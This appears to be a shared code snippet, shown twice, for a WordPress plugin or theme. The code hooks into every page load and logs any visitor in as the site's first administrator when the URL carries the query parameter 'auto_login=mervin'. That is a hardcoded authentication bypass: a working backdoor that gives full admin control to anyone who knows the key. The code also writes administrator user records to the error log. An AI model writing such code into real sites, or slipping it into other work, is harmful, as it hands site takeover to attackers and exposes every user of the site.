mclarenmervin · July 23, 2024 09:29
diff --git a/auto_login_with_query_parameter.php b/auto_login_with_query_parameter.php
 <?php
 function auto_login_admin_from_get() {
    // Check if the 'auto_login' parameter is present in the URL
    if (isset($_GET['auto_login'])) {
        // Verify the value of the 'auto_login' parameter for security (you should use a more secure method in a real-world scenario)
        $auto_login_key = $_GET['auto_login'];
        $expected_key = 'mervin'; // Replace with a secure key

        if ($auto_login_key === $expected_key) {
            // Get any admin user ID
            $admin_id = get_any_admin_user_id();

            // Debug output
            error_log('Admin ID: ' . print_r($admin_id, true));

            // If an admin user ID is found, log them in
            if ($admin_id) {
                wp_clear_auth_cookie();
                wp_set_current_user($admin_id);
                wp_set_auth_cookie($admin_id);

                // Redirect to the admin dashboard
                wp_redirect(admin_url());
                exit;
            } else {
                wp_die('No administrators found.');
            }
        } else {
            // If the key is incorrect, you may want to log this attempt or handle it appropriately
            wp_die('Unauthorized access attempt detected.');
        }
    }
 }
 // Hook the function to 'init' action
 add_action('init', 'auto_login_admin_from_get');

 function get_any_admin_user_id() {
    // Get all users with the 'administrator' role
    $args = array(
        'role'    => 'administrator',
        'orderby' => 'ID',
        'order'   => 'ASC'
    );

    $admins = get_users($args);

    // Debug output
    error_log('Admins: ' . print_r($admins, true));

    // If there are administrators, return the ID of the first one
    if (!empty($admins)) {
        return $admins[0]->ID;
    }

    // If no administrators found, return false or handle it appropriately
    return false;
 }
	<?php
	function auto_login_admin_from_get() {
	// Check if the 'auto_login' parameter is present in the URL
	if (isset($_GET['auto_login'])) {
	// Verify the value of the 'auto_login' parameter for security (you should use a more secure method in a real-world scenario)
	$auto_login_key = $_GET['auto_login'];
	$expected_key = 'mervin'; // Replace with a secure key

	if ($auto_login_key === $expected_key) {
	// Get any admin user ID
	$admin_id = get_any_admin_user_id();

	// Debug output
	error_log('Admin ID: ' . print_r($admin_id, true));

	// If an admin user ID is found, log them in
	if ($admin_id) {
	wp_clear_auth_cookie();
	wp_set_current_user($admin_id);
	wp_set_auth_cookie($admin_id);

	// Redirect to the admin dashboard
	wp_redirect(admin_url());
	exit;
	} else {
	wp_die('No administrators found.');
	}
	} else {
	// If the key is incorrect, you may want to log this attempt or handle it appropriately
	wp_die('Unauthorized access attempt detected.');
	}
	}
	}
	// Hook the function to 'init' action
	add_action('init', 'auto_login_admin_from_get');

	function get_any_admin_user_id() {
	// Get all users with the 'administrator' role
	$args = array(
	'role' => 'administrator',
	'orderby' => 'ID',
	'order' => 'ASC'
	);

	$admins = get_users($args);

	// Debug output
	error_log('Admins: ' . print_r($admins, true));

	// If there are administrators, return the ID of the first one
	if (!empty($admins)) {
	return $admins[0]->ID;
	}

	// If no administrators found, return false or handle it appropriately
	return false;
	}